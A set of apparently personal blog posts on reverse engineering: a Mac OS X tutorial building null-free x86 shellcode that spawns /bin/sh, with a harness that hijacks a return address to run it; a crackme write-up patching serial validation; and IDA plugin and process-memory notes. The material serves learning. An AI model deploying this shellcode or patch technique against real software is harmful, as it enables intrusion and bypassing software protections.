Spawning A Shell – Mac OS X Shellcode

Continuing my foray into the world of reverse engineering and program analysis, I have spent some time lately looking at shellcode.  For the uninitiated, shellcode refers to the small piece of code used as the payload when exploiting a software vulnerability; it got its name because it usually spawns a shell for the attacker to use.  In this post I will show you the process of creating shellcode on Mac OS X, so let’s get started!

Before you do anything you need an idea of what you want your shellcode to do.  For this post I have decided to develop the shellcode to spawn a shell in OS X.  Also worth noting is that this shellcode is written in 32-bit x86.

Step 1: Write The Corresponding C Code

When I write shellcode I like to try and write the corresponding C code first.  This may seem like a waste of time because the shellcode should be simple; however, I’ve found it acts as a guide when writing the shellcode because I can read the high-level interpretation quickly and keep track of where I am in the code.

#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *execve_argv[2];

    execve_argv[0] = "/bin/sh";   /* program to run, also argv[0] */
    execve_argv[1] = NULL;        /* argv must be NULL terminated */

    execve(execve_argv[0], execve_argv, NULL);
    exit(0);                      /* only reached if execve() fails */
}

 

There isn’t much to this program; all it does is call execve() and spawn a shell.  Note that the call to exit() isn’t strictly necessary because a successful execve() replaces the current process image with the new one and never returns; exit() is only reached if execve() fails.  With our template code in place it is now time to convert it into assembly.

Step 2: Assembly Code

Our first version will just be a simple translation from the C code into assembly.  The only difference is that, rather than calling the C library routines, we will make direct system calls.  The Mac OS X system call interface is vast and complicated, with hundreds of calls and multiple mechanisms to trap to the kernel; however, for our purposes all we need to know is that the system call number must be placed in %eax, the function arguments are pushed onto the stack in right-to-left order, and the kernel can be entered using the int $0x80 instruction.  Below is the assembly code to spawn a shell.

 

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 leal    path, %ebx      # Place address of path in %ebx
8 movl    %ebx, (args)    # Set pointer to path as first element in args
9
10 leal    args, %ecx      # Place address of args in %ecx
11
12 pushl   $0x0            # envp (null)
13 pushl   %ecx            # args
14 pushl   %ebx            # path
15
16 pushl   $0x0            # stack adjustment
17 int     $0x80           # trap
18
19 movl    $0x1, %eax      # SYS_exit
20
21 pushl   $0x0            # exit value
22
23 pushl   $0x0            # stack adjustment
24 int     $0x80           # trap
25
26 .data
27
28 path:   .asciz "/bin/sh"
29
30 args:   .long 0, 0      # argv[0] and argv[1], one 32-bit pointer each

 

As mentioned above, the system call number must be placed in %eax.  In our program this is done on line 5 for the execve() call and on line 19 for the exit() call.  You can obtain these numbers from the file /usr/include/sys/syscall.h on a machine running Mac OS X.  The next trick is to get the proper addresses for the path and argv arguments to execve(); we do this on lines 7-10.  With all of this in place, all we need to do is push our arguments and trap to the kernel.  Notice that immediately before trapping we push another value onto the stack.  This is because the trap in OS X is typically issued from inside a function that was reached with a call instruction, and that call pushes a return address onto the stack on top of the arguments.  Since we aren’t performing this call, we must push a dummy value onto the stack ourselves so that our arguments are in the proper place when the interrupt is handled.  Once we finish this for execve() we simply rinse and repeat for exit().
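To make the lookup of system call numbers concrete, here is a small Python sketch that pulls SYS_ constants out of header text.  The two #define lines in SAMPLE_HEADER simply mirror the values used above (1 and 59, which is 0x3b); the sample text and the helper name parse_syscalls are illustrative assumptions, and on a real machine you would feed it the contents of the header file instead.

```python
import re

# Two lines in the style of <sys/syscall.h>.  The values match the ones used
# in the assembly above (SYS_exit = 1, SYS_execve = 59 = 0x3b).
SAMPLE_HEADER = """
#define SYS_exit           1
#define SYS_execve         59
"""

def parse_syscalls(header_text):
    """Return a {name: number} dict for every '#define SYS_<name> <n>' line."""
    pattern = re.compile(r"^#define[ \t]+SYS_(\w+)[ \t]+(\d+)[ \t]*$",
                         re.MULTILINE)
    return {name: int(num) for name, num in pattern.findall(header_text)}

syscalls = parse_syscalls(SAMPLE_HEADER)
for name, number in sorted(syscalls.items()):
    print("SYS_%s = %d (0x%x)" % (name, number, number))
```

Printing the number in hex as well makes it easy to compare against the immediates that appear in the assembly.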

Regarding our .data section, we only need entries for our path string and the argv array.  I’ve used the .asciz directive because it saves me having to manually add a null byte to our string.  To create the argv array we reserve space for two 32-bit pointers: the address of the path string is copied into the first, and the second is left set to null.

This code can be compiled and run as follows:

dean@BigBertha:~/shellcode $ as -arch i386 -o execve_simple.o execve_simple.s
dean@BigBertha:~/shellcode $ ld -arch i386 -o execve_simple execve_simple.o
dean@BigBertha:~/shellcode $ ./execve_simple
sh-3.2$ exit
exit
dean@BigBertha:~/shellcode $

Take note of the usage of the -arch i386 option.  This instructs the assembler and linker to use the i386 architecture (calling conventions, register names, available instructions, etc.) as opposed to the default setting on Mac OS X, which is 64-bit x86.

So, that’s pretty cool! We have successfully written a program in assembly that spawns a shell for us! Now, how to take this code and create proper shellcode?

Step 3: Removing The .data Section

Let’s tackle the easy part first and start by removing the .data section from our program.  To do this, yet still have the data available to us, we will move our data onto the stack instead.  This can be done by first writing our string to the stack and then doing a little pointer manipulation to set up the argv array.

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 pushl   $0x0068732f     # place '/bin/sh' on
8 pushl   $0x6e69622f     # the stack
9 movl    %esp, %ebx      # save pointer to string
10
11 pushl   $0x0            # argv terminating null pointer
12 pushl   %ebx            # pointer to path
13 movl    %esp, %ecx      # save pointer to argv
14
15 pushl   $0x0            # envp (null)
16 pushl   %ecx            # argv (on stack)
17 pushl   %ebx            # path (on stack)
18
19 pushl   $0x0            # stack adjustment
20 int     $0x80           # trap
21
22 movl    $0x01, %eax     # SYS_exit
23 pushl   $0x0            # exit return code
24 pushl   $0x0            # stack adjustment
25 int     $0x80           # trap

 

The first thing to notice is that lines 7-8 write the string '/bin/sh' to the stack.  Unfortunately, having the string on the stack (and out of a .data section) is only part of the game: we also need a pointer to the string both in the argv array and as the first parameter to execve().  To do this, as seen on line 9, we copy the stack pointer (after pushing the string) into another register that we can use later on, effectively getting us a pointer to our string!  Lines 11-13 are similar; however, they set up the argv array for us instead of pushing a string.  Aside from using different registers, the rest of our program is very similar to our original implementation.
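If you are wondering where the two constants pushed on lines 7-8 come from, the following Python sketch derives them.  It null terminates the string, cuts it into 4-byte chunks, reads each chunk as a little-endian 32-bit integer (x86 is little-endian), and reverses the order because the stack grows downward.  The function name push_constants is just an illustrative choice.

```python
import struct

def push_constants(s):
    """Return the 32-bit immediates to push, in push order, for string s."""
    data = s.encode("ascii") + b"\x00"      # C strings are null terminated
    data += b"\x00" * (-len(data) % 4)      # pad to a multiple of 4 bytes
    words = struct.unpack("<%dI" % (len(data) // 4), data)
    # The stack grows downward, so the last chunk must be pushed first.
    return list(reversed(words))

for word in push_constants("/bin/sh"):
    print("pushl   $0x%08x" % word)
```

For "/bin/sh" this yields the same two immediates, in the same order, as the listing above.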

Step 4: Removing Null Bytes

At this point things become a little tedious as we must remove all null bytes from our code.  The reason for this is that shellcode is frequently injected as a string so any null byte would signal the (incorrect) end of the string.

To find the null bytes what you can do is first compile the program, then use otool to look for any null bytes in the .text section.  For example, we get the following with our previous code sample.

dean@BigBertha:~/shellcode $ otool -t execve_no_data
execve_no_data:
(__TEXT,__text) section
00001f84 b8 3b 00 00 00 68 2f 73 68 00 68 2f 62 69 6e 89
00001f94 e3 6a 00 53 89 e1 6a 00 51 53 6a 00 cd 80 b8 01
00001fa4 00 00 00 6a 00 6a 00 cd 80

Here we see that there are three consecutive null bytes beginning at address 0x1f86, which correspond to the movl on line 5 of our last code sample.  To get rid of these null bytes we can begin by clearing %eax to 0 using XOR and then copying 0x3b into the low byte of the register (lines 14-15 below).  Rather than going through each null byte I’ll leave that as a bit of fun for you :)  Once you’ve made all the changes you should end up with code that looks something like the following program.

1 /* Shellcode to spawn a shell on OS X.  We can't use the 'traditional'
2  * technique of addressing relative to a call site in the .text because
3  * OS X is smart enough to know that it should not allow code to be modified
4  * in that section.
5  *
6  * Our new technique is to place all the data on the stack, manipulate it
7  * there, and then simply read it from the stack.
8  */
9
10 .text
11 .globl start
12
13 start:
14 xorl    %eax, %eax      # clear %eax
15 movb    $0x3b, %al      # SYS_execve
16
17 xorl    %edx, %edx      # clear %edx
18 movl    $0x68732f01, %edx   # '/sh' plus a 0x01 filler in the low byte
19 shrl    $0x08, %edx     # shift the filler out, leaving '/sh' and a null
20
21 pushl   %edx            # second half of the string
22 pushl   $0x6e69622f     # '/bin'
23 movl    %esp, %ebx      # save pointer to string
24
25 xorl    %edx, %edx      # %edx = 0, our null source from here on
26
27 pushl   %edx            # argv terminating null pointer
28 pushl   %ebx            # pointer to path
29 movl    %esp, %ecx      # save pointer to argv
30
31 pushl   %edx            # envp (null)
32 pushl   %ecx            # argv (on stack)
33 pushl   %ebx            # path (on stack)
34
35 pushl   %edx            # stack adjustment
36 int     $0x80           # trap
37
38 movb    $0x01, %al      # SYS_exit
39 pushl   %edx            # exit return code
40 pushl   %edx            # stack adjustment
41 int     $0x80           # trap

 

As usual you can compile and test this to make sure it still works as intended.
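Hunting for null bytes by eye gets old quickly, so here is a rough Python sketch that does it for you.  It takes hex lines in the format printed by otool -t earlier in this step and reports the address of every 0x00 byte; it then checks the shift trick used in the null-free version and confirms that the final byte string (copied from the test program in Step 5) is clean.  The helper name null_byte_addresses is my own, and the parser only handles the simple "address followed by bytes" layout shown in this post.

```python
OTOOL_DUMP = """\
00001f84 b8 3b 00 00 00 68 2f 73 68 00 68 2f 62 69 6e 89
00001f94 e3 6a 00 53 89 e1 6a 00 51 53 6a 00 cd 80 b8 01
00001fa4 00 00 00 6a 00 6a 00 cd 80
"""

def null_byte_addresses(dump):
    """Return the address of every 0x00 byte in 'otool -t' style hex lines."""
    found = []
    for line in dump.splitlines():
        fields = line.split()
        if not fields:
            continue
        base = int(fields[0], 16)           # address of the first byte
        for offset, byte in enumerate(fields[1:]):
            if int(byte, 16) == 0:
                found.append(base + offset)
    return found

nulls = null_byte_addresses(OTOOL_DUMP)
print("null bytes at:", [hex(addr) for addr in nulls])

# The shift trick: load '/sh' with a non-zero filler byte, then shift it out.
packed = 0x68732f01
shifted = packed >> 8
print("0x%08x >> 8 = 0x%08x" % (packed, shifted))

# The final shellcode bytes, as used in the test program.
SHELLCODE = bytes.fromhex(
    "31c0b03b31d2ba012f7368c1ea085268"
    "2f62696e89e331d2525389e152515352"
    "cd80b0015252cd80"
)
print("final shellcode contains a null byte:", 0 in SHELLCODE)
```

The first three addresses reported are the ones discussed above, belonging to the movl that loads the system call number.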

Step 5: Testing Our Code

For this last part we want to see our code in action, being executed on the stack of a simple program.  Our test program is as follows:

1   #include <stdlib.h>
2
3   char *sc = "\x31\xc0\xb0\x3b\x31\xd2\xba\x01\x2f\x73\x68\xc1\xea\x08\x52\x68"
4              "\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x52\x51\x53\x52"
5              "\xcd\x80\xb0\x01\x52\x52\xcd\x80";
6
7   int main(int argc, char **argv)
8   {
9     int *mret;
10    mret = (int *)&mret + atoi(argv[1]);
11    *mret = (int)sc;
12  }

 

Lines 3-5 of this code contain our shellcode; it’s just written in hex rather than human-readable mnemonics.  The rest of the program just creates a variable on the stack, gets the address of that variable, adds a supplied offset to it, and then copies the address of our shellcode into (hopefully) the location used to store the return address.  With the address of our shellcode placed there, our code should be executed when main() returns, resulting in a shell being spawned.

My First Crackme!

I finally got around to trying to solve a crackme for OS X this morning and it was a blast!  For those who are interested the crackme can be found on this site (MSJ2009#1.zip).  The goal of the crackme (not surprisingly) is to successfully register the application using either a hex edit, serial sniff, or keygen.

Step 1: Recon!

Before I even ran the application I went and dug around in the application package contents.  I didn’t find anything all that interesting there so it was time to dig a little deeper.  To do this I decided to see what symbols were in the binary using the nm tool.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ nm Challenge\ #1

Challenge #1 (for architecture i386):
0000251e t -[Level1 applicationDidFinishLaunching:]
00002a94 t -[Level1 applicationShouldTerminateAfterLastWindowClosed:]
00002433 t -[Level1 awakeFromNib]
000026d6 t -[Level1 cancelButton:]
000025ac t -[Level1 continueWelcomeButton:]
000027e3 t -[Level1 emailResults:]
00002a88 t -[Level1 isRegistered]
0000264e t -[Level1 okErrorSheetButton:]
00002692 t -[Level1 okIncorrectSerialButton:]
000025f0 t -[Level1 quitCorrectSerialButton:]
000026f7 t -[Level1 unregisterButton:]
00002a9e t -[Level1 validateSerial:forName:]
0000288e t -[Level1 verifyRegistration:]
...

Great! There is a function just for validation, now all we need to do is to get that to say we’ve passed in valid credentials.

Step 2: Validation

The first step I took in manipulating the validation function was to see what types the function expected.  You can get this information using otool as follows.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ otool -Vo Challenge\ #1
...
	method_name 0x00002d7d validateSerial:forName:
	method_types 0x00002cb6 c16@0:4@8@12
	method_imp 0x00002a9e -[Level1 validateSerial:forName:]
...
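The method_types string in that output is a compact Objective-C type encoding.  As a rough guide to reading it, here is a Python sketch that splits the string into type codes and the numbers that follow them.  It only knows the three codes that appear in this particular string (c, @ and :), and the function name decode_method_types is an illustrative assumption, not part of any tool.  The number after the return type is the total size of the argument frame; the numbers after the other codes are each argument’s offset within it.

```python
import re

# Only the type codes needed for this example; the full table is larger.
TYPE_NAMES = {"c": "char", "@": "object (id)", ":": "selector (SEL)"}

def decode_method_types(encoding):
    """Split a simple method type encoding into (type name, number) pairs."""
    pairs = re.findall(r"([c@:])(\d+)", encoding)
    return [(TYPE_NAMES[code], int(num)) for code, num in pairs]

decoded = decode_method_types("c16@0:4@8@12")
return_type, frame_size = decoded[0]
print("returns %s, %d bytes of arguments" % (return_type, frame_size))
for type_name, offset in decoded[1:]:
    print("  argument at offset %2d: %s" % (offset, type_name))
```

The first two arguments are the implicit self and selector that every Objective-C method receives, which leaves the two objects at offsets 8 and 12 as the arguments named in validateSerial:forName:.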

From this we know that the function expects two objects as arguments and it returns a char indicating whether or not the credentials have been successfully verified.  The next step is to see what the heck this function is doing.  Once again we use otool to disassemble the binary.  In order to save space I’ve only included the parts relevant to this crack.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ otool -Vt Challenge\ #1
...
-[Level1 validateSerial:forName:]:
00002a9e        pushl   %ebp
00002a9f        movl    %esp,%ebp
00002aa1        pushl   %edi
00002aa2        pushl   %esi
00002aa3        pushl   %ebx
00002aa4        subl    $0x3c,%esp
00002aa7        movl    0x00004040,%eax
00002aac        movl    %eax,0x04(%esp)
00002ab0        movl    0x10(%ebp),%eax
00002ab3        movl    %eax,(%esp)
00002ab6        calll   0x0000505e      ; symbol stub for: _objc_msgSend
00002abb        cmpl    $0x08,%eax
00002abe        jne     0x00002c4e
...
00002c4e        xorl    %edx,%edx
00002c50        addl    $0x3c,%esp
00002c53        movl    %edx,%eax
00002c55        popl    %ebx
00002c56        popl    %esi
00002c57        popl    %edi
00002c58        leave
00002c59        ret

We see that this function begins as expected by setting up the stack frame, saving the registers it will trash, and allocating space for local variables.  The next point of interest is the call to objc_msgSend.  This function takes a variable number of arguments, the first of which is the object to send a message to and the second of which is the message (selector) to be sent.  All remaining arguments to objc_msgSend are passed along as the arguments of the message.  If you set a breakpoint at the beginning of the validate function and run the program in gdb you can find out (by inspecting memory) that the message being sent is the length message.  We can also see that the receiving object is the first parameter (the serial number) of the validation function.  The next thing to notice is that if the length of the serial number is not eight characters the function returns immediately.  We can leverage the reliance on the serial number string length and the immediate return to cause the function to always return true regardless of which serial number is entered.

Step 3: Hex Edit

For the sake of simplicity I decided to solve this crackme using a simple hex edit.  In order to do this successfully all we need to know is (1) where to make the change and (2) what to change the code to.  The standard calling convention on x86 (32-bit) mandates that return values from a function be placed in %eax; therefore our goal is to modify the value of %eax just before the validate function exits.  Since the exit path copies %edx into %eax (the movl at 0x2c53), I chose to change the xorl at address 0x2c4e to a movl instruction that places 0x1 in %edx.  You can make this change by opening the binary in your favourite hex editor and then changing the bytes at 0x2c4e to ba01000000.  Be sure to shift the remaining bytes in the function over to make space for the additional bytes.  Assuming the changes were made properly, the next time you run the program it should register your serial number without a problem.
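To see what the edit does at the byte level, here is a Python sketch that applies it to the tail of the function.  Treat the byte values as an assumption: I have reconstructed them from the mnemonics in the disassembly using the usual encodings, so compare them against what your hex editor shows before relying on them.  The sketch also does not know what lies after the ret; the patched tail is three bytes longer, and it is up to you to make sure those three bytes land somewhere harmless.

```python
# Tail of the validate function (addresses 0x2c4e through 0x2c59),
# reconstructed from the disassembly; assumed encodings, not a raw dump.
ORIGINAL_TAIL = bytes.fromhex(
    "31d2"      # xorl  %edx,%edx
    "83c43c"    # addl  $0x3c,%esp
    "89d0"      # movl  %edx,%eax
    "5b5e5f"    # popl  %ebx, popl %esi, popl %edi
    "c9c3"      # leave, ret
)

XOR_EDX_EDX = bytes.fromhex("31d2")
MOV_1_EDX = bytes.fromhex("ba01000000")     # movl $0x1,%edx

def patch_tail(tail):
    """Swap the leading xorl for the longer movl, shifting the rest over."""
    if not tail.startswith(XOR_EDX_EDX):
        raise ValueError("unexpected bytes at the patch site")
    return MOV_1_EDX + tail[len(XOR_EDX_EDX):]

patched = patch_tail(ORIGINAL_TAIL)
growth = len(patched) - len(ORIGINAL_TAIL)
print("before:", ORIGINAL_TAIL.hex())
print("after: ", patched.hex())
print("function tail grows by", growth, "bytes")
```

Checking the bytes at the patch site before writing anything is a cheap way to avoid patching the wrong offset or the wrong architecture slice of the binary.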

 

A Week With IDA

Currently I am working on two projects, intropy and ICE, that involve the popular disassembler IDA Pro.  With the deadline for the annual IDA Pro plugin contest just around the corner I thought this was a great time to dig deep into IDA and see what I can do.  This post serves as a summary of my experiences and reactions using IDA Pro as well as some of the other technologies I tried to integrate over the past week or so.

The Goal: RECoop

Despite my best efforts I am not a reverse engineer.  I continue to be fascinated by trying to pull software apart to understand how it works, but at this point I’m far from what I’d call a reverse engineer.  That being said, when I began trying to think of ideas for a plugin that I could conceivably write in a week and that would still be useful, I looked to other aspects of computing.  After tossing out a few other ideas I began to think more about how I’d like to become more proficient in the art of reverse engineering but at times find the lack of guidance to be somewhat discouraging.  I then began to think about how cool it would be if I could sit down at my computer, open up IDA Pro, and have a mentor help guide me through some exercises.  With that the idea for RECoop was born.

The main idea behind RECoop (Cooperative Reverse Engineering) is that the task of reverse engineering is currently performed largely in solitude, and I believe a single person would go insane trying to reverse some of the larger pieces of software out there.  Therefore what we need is a way for reverse engineers to work on the same project, concurrently and in real time.  I planned to achieve this by writing a plugin for IDA Pro that brought the communication facilities provided by Skype together with the massively scalable data storage systems provided by the Amazon Web Services.  With RECoop I envision a team of reverse engineers all working together to understand a single piece of software and hope that as a result there will be both a savings in time as well as a better understanding of the software in question.  Lastly, two environments that I think would benefit from RECoop immensely are the (virtual) classroom and globally distributed teams of engineers.

IDA Pro And The SDK

Rather than immediately trying to reverse engineer the ubiquitous calculator application like I’m sure most newcomers to IDA Pro do, I dove straight into the SDK and explored IDA Pro through the eyes of someone trying to bring new functionality to the disassembler.

Hex Rays has made two interfaces to the IDA Pro SDK available to developers.  The primary interface is written in C++ and allows developers to integrate deeply with IDA Pro: creating plugins, processor modules, file loaders, and much more.  The secondary interface is provided by a (now standard) plugin called IDAPython which, not surprisingly, provides a Python interface to the SDK.  The C++ and Python interfaces are largely the same; unfortunately I have yet to dive deep into the Python interface, so I am not certain what its limitations are.

Upon downloading and unpacking the SDK I first took a look at some of the header files that are available.  The first thing that stood out to me was that the header files are extremely well documented.  All functions that Hex Rays intends to be used are marked with the ida_export qualifier and have a description of the function along with its inputs and outputs.  Although it would have been useful to have a nice web interface to search the API, it is quite easy to grep through the header files and discover what is available to use.  Another observation that I made was that the API is quite modular and the division of functionality into header files seemed quite logical.  After rooting around the headers a bit I tried to build the SDK.

According to the documentation, building the SDK should be a simple matter of defining a couple environment variables and then running the make utility.  Unfortunately it was not quite that simple and required me to make a few modifications to the Makefiles.  Note that I was building the SDK on Mac OS X 10.6 and from the Makefiles included it appears that Hex Rays has been testing against Mac OS X 10.5 so most of the changes were just to update some of the paths and include files to reflect OS X 10.6.  Once these changes were made the SDK built with no issues.

To develop RECoop I needed two things from the SDK: the ability to create interface components in IDA Pro, and the ability to integrate with the IDA Pro database used to store information about the current binary being analyzed.  As of IDA Pro 6.0 Hex Rays transitioned the IDA Pro interface to the platform independent application framework Qt.  Rather than exposing the entire Qt framework Hex Rays has opted to provide a small subset of GUI functions that they feel will suit the vast majority of plugins.  With this subset it is possible to create some basic dialogs, create and manipulate control-flow graphs, create forms (IDA’s version of sub-windows), annotate existing disassembly views, and a few other things.  While I agree this is likely enough support for most, it was not enough for RECoop and I had to build and integrate the full Qt framework.  Hex Rays made (in my opinion) a number of smart choices in designing the API, one of which is the notifications to alert plugins of events in various components of IDA Pro such as the UI and database.  Not only did they adopt a notification-based system, they have allowed developers to hook into these notifications and perform actions when they occur.  This feature alone is largely what makes a plugin like RECoop possible.

Plugins in IDA Pro are compiled as dynamic libraries presumably to leverage some of the code loading facilities provided by the underlying operating system.  In addition each plugin must export a special structure that tells IDA Pro what the initialization, termination, and run functions of the plugin are along with various pieces of metadata such as plugin descriptions and preferred keyboard shortcuts.

Perhaps surprisingly (I was surprised), IDA Pro is a single threaded application.  I’m not entirely certain why that is the case however I speculate that it would simplify the operations associated with analyzing the binary and retrieving/storing data in the database.  Regardless, this means that all plugins must run on the main thread and can cause the UI to lock up.  I suppose for the vast majority of plugins this isn’t a major issue, but for RECoop it quickly presented a number of challenges.  In addition, any operation that manipulates the UI drawing context must be called on the main thread.  This too raised some issues in the development of RECoop.

Skype

At the beginning of this project I was actually completely uncertain as to whether or not integrating with Skype was even possible.  It turns out that the fine folks at Skype thought of people like me and have made a product called SkypeKit available.  SkypeKit enables developers to integrate Skype into their products and provide the same powerful real-time communications offered by the official Skype application.  To make this work the folks at Skype took the approach of splitting the platform into two parts: a runtime and the SDK.  The SkypeKit runtime is essentially a headless Skype client.  Through the SDK you can interact with the runtime and perform actions such as placing and receiving calls (video and audio), managing your Skype contacts, dialing out of the Skype network to the phone network, and much more.  The SkypeKit runtime is run as a daemon and as a result the SDK interacts with it through the IPC facilities provided by the OS.  Due in part to this separation, SkypeKit takes a unique approach to communication based on asynchronous actions and the use of notifications.

During the login process a developer using SkypeKit must authenticate with Skype and create an Account object.  To do this you call a series of functions on the main Skype object to acquire the account information and then call a login function.  Once this has been done the created Account object is then notified once it has been logged in.  The process is fairly straightforward and outlined in a number of SkypeKit tutorials; however, when integrating this process with IDA Pro it was found that the main IDA thread would block waiting for a response from Skype and in turn the response it was expecting would never be received because of the blocking.  This problem was easily rectified by introducing a second thread to handle communication with Skype.  Unfortunately this solution has two disadvantages: all UI calls must be somehow moved to the main thread, and it is unclear whether or not the introduction of additional threads has any adverse effects on IDA Pro.  In addition to this I also ran into some minor issues with how the Skype SDK handles subclassing of the provided objects.

Qt

As with most things in this project, I had never used Qt before and was pleasantly surprised once I began to use it.  As previously noted, IDA Pro 6.0 and up are all based on a platform independent interface developed using Qt.  In order to provide some of the functionality needed for the plugin it is necessary to go above and beyond the UI support provided by the IDA Pro SDK, and this can be done by leveraging the full Qt framework.  The Qt framework itself is extremely well documented and provides facilities for UI elements and widgets, thread and process management, and much more.  In addition to a large amount of functionality the Qt developers also introduce one technique for communication, signals and slots, that I found rather intriguing.

The idea behind signals and slots is that the relationship between UI elements is both hierarchical, in terms of widget parent-child relationships, and functional, in that text from a text input widget may be used in multiple other widgets.  To support this functional relationship Qt introduced the idea of signals, which are emitted as certain events occur, and slots, which can be executed when the containing object receives a specified signal.  This functionality is outside the scope of standard C++ constructs and therefore requires the use of the Qt meta-object compiler during the build phase to generate the necessary code.  In the context of RECoop, signals and slots enable the cross-thread communication required to keep all drawing operations on the main thread.  Lastly, note that it is possible (and quite useful) to add custom signals and slots to non-Qt objects.  For example, when a user types a chat message in RECoop a signal is emitted that causes Skype to send the message over the network.
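To give a feel for why this pattern helps with the threading problem, here is a toy version in plain Python.  This is not how Qt implements signals and slots and it is not code from RECoop; the Signal class and run_pending function are made up for illustration.  The idea it borrows is that of a queued connection: emitting a signal from a worker thread only records the call, and the slot itself runs later on the thread that owns the UI.

```python
import queue
import threading

class Signal:
    """Toy signal: calls to connected slots are queued for the main thread."""

    def __init__(self, main_queue):
        self._slots = []
        self._queue = main_queue

    def connect(self, slot):
        self._slots.append(slot)

    def emit(self, *args):
        # Safe to call from any thread: nothing runs here, calls are queued.
        for slot in self._slots:
            self._queue.put((slot, args))

def run_pending(main_queue):
    """Run every queued slot call; meant to be called from the main thread."""
    while True:
        try:
            slot, args = main_queue.get_nowait()
        except queue.Empty:
            return
        slot(*args)

main_queue = queue.Queue()
received = []
message_received = Signal(main_queue)
message_received.connect(received.append)   # stand-in for a UI update slot

# A worker thread (standing in for the Skype communication thread) emits.
worker = threading.Thread(target=message_received.emit, args=("hello",))
worker.start()
worker.join()

run_pending(main_queue)     # the main thread delivers the queued call
print(received)
```

In a real application run_pending would be driven by the UI event loop rather than called by hand, which is the part the Qt framework takes care of for you.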

Amazon Web Services

To provide the database backend required by RECoop I decided to go with Amazon SimpleDB and a server implemented in Erlang running in an Amazon EC2 instance.  The decision to go with Amazon Web Services was guided by a number of factors.  First, this meant I didn’t have to provide my own servers for the project.  Although I could have hosted the service on this site, I wanted to decouple the service from my own site in order to encourage private installs and relieve me of managing more stuff.  Second, Amazon SimpleDB boasts the ability to provide highly scalable database solutions that are capable of handling large numbers of concurrent connections.  Since the idea is to have many people using the same database at once in RECoop this seemed like a natural fit.  Finally, I had never used the Amazon Web Services so this seemed a good opportunity to check them out.

Erlang was selected for implementing the RECoop server because it provides exceptional facilities for handling concurrent connections, is extremely expressive and compact, and has facilities for quickly packing and unpacking binary data.  Since this component of RECoop is still largely unimplemented I will save a discussion of it for a future post.

Wrap Up

For most the first week with IDA Pro is probably filled with analyzing countless lines of assembly code, staring blankly at instruction set references, and banging your head against the wall trying to wrap it around the low-level aspects of computers.  For me it was an exploration of multiple SDKs; insights into API design, programming language constructs, and proper documentation; and a chance to explore several different technologies with the goal of integrating them to try and foster collaboration among reverse engineers.

Basic Memory Manipulation With intropy

About a month and a half ago I wrote a post about dumping memory on Mac OS X which was followed by a post introducing intropy, a Python framework I’m developing that enables you to effortlessly analyze software.  In this post I am going to demonstrate some of the power of (a very early implementation of) intropy by taking you through a script that writes some bytes to memory in another process then reads them back.

Below is the complete code to spawn a new process, execute a command, write a block of data into the new process, and then read that data back into our process.  You’ll notice that compared to my description of how to dump memory on Mac OS X this Python script is a lot less scary.  One thing that I really like about intropy is that you don’t need to understand the details of how a call to task_for_pid() or mach_vm_read() works; all you need to do is describe what you want to accomplish and get it done.

      1 """
      2     Module: mem
      3     Author: Dean Pucsek <dean@lightbulbone.com>
      4     Date: June 2011
      5
      6     Copyright (C) 2011 Dean Pucsek.  All rights reserved.
      7
      8     Write a set of bytes to memory then read them back.
      9 """
     10
     11 import idb
     12
     13 def main():
     14     addr = 0x100001000
     15     sz = 0x10
     16
     17     payload =  "\x41\x42\x43\x44"
     18     payload += "\x45\x46\x47\x48"
     19     payload += "\x49\x4a\x4b\x4c"
     20     payload += "\x4d\x4e\x4f\x50"
     21
     22     dbg = idb.idb()
     23     ts = dbg.spawn("sleep 90")
     24
     25     dbg.memwrite(ts, addr, payload)
     26
     27     buf = dbg.memread(ts, addr, sz)
     28
     29     for i in range(0,sz):
     30         print hex(ord(buf.raw[i])),
     31
     32     print ' '
     33
     34 if __name__ == "__main__":
     35     main()

While I’m sure you can figure out what each line does, especially if you are familiar with Python, let’s step through some of the more interesting bits.

Line 11

This line simply imports the idb module of intropy.  Note that as of writing this post I still have yet to publicly release the intropy code base so you’ll have to wait before you can try this out yourself.

Lines 14-20

These lines initialize some of the data we need for the read and write.  The variable names and contents should speak for themselves, but if you’re curious the payload is nothing more than the ABCs!

Line 22

Here we are initializing our dbg variable with a new instance of the idb class.  If you’re not familiar with Python classes and instantiation I highly recommend you check out the documentation.

Line 23

Rather than attach ourselves to an existing process we have decided to spawn a new one.  The spawn() method takes care of forking, executing, and attaching a new process to our session.  It returns an object known as a task_struct in intropy which contains various pieces of information about the process and resources it is associated with.  In intropy you should never need to directly access this structure.  The reason it is returned is so that other functions can make use of it.  In future versions the task_struct will likely not be exposed.

Line 25

Write to memory! Yep, it’s a one liner, were you hoping for more?  This line will attempt to copy the payload into the specified location of the spawned process.  In order for this to be successful the destination address must be writable.

Line 27

Read sz bytes starting at addr in the spawned process!  Aren’t one liners awesome? This call returns a buffer that contains the data read which is implemented using a Python ctypes array (hence the funky printing on lines 29-32).  In a future revision of intropy I may have this function return a Python string instead in order to increase the amount of existing code that can be used to analyze the returned data.
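Since intropy isn’t available yet, here is a stand-alone sketch of just the ctypes part, so you can see why the printing looks the way it does.  It is written for Python 3 (the script above is Python 2) and it builds the buffer by hand; that memread() returns something shaped like this ctypes char array is my assumption for the sake of the example.

```python
import ctypes

payload = b"ABCDEFGHIJKLMNOP"       # the same 16 bytes as the script's payload
sz = 0x10

# Assumption: memread() hands back something like this ctypes char array.
buf = (ctypes.c_char * sz).from_buffer_copy(payload)

# buf.raw is the whole buffer as a bytes object.  In Python 3, iterating over
# bytes yields integers, so the ord() call from the Python 2 script is not
# needed here.
as_hex = [hex(b) for b in buf.raw]
print(" ".join(as_hex))

# Going from the ctypes array to an ordinary string is a one-step conversion.
as_text = buf.raw.decode("ascii")
print(as_text)
```

The last two lines hint at why returning a plain Python string from memread() would make the result easier to pass to existing code.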

That, my friends, is how you write and read memory in intropy.  Although this example is quite simple it definitely shows how powerful intropy can be in terms of reduced coding, more descriptive code, and portability.

intropy: Program Introspection Using Python

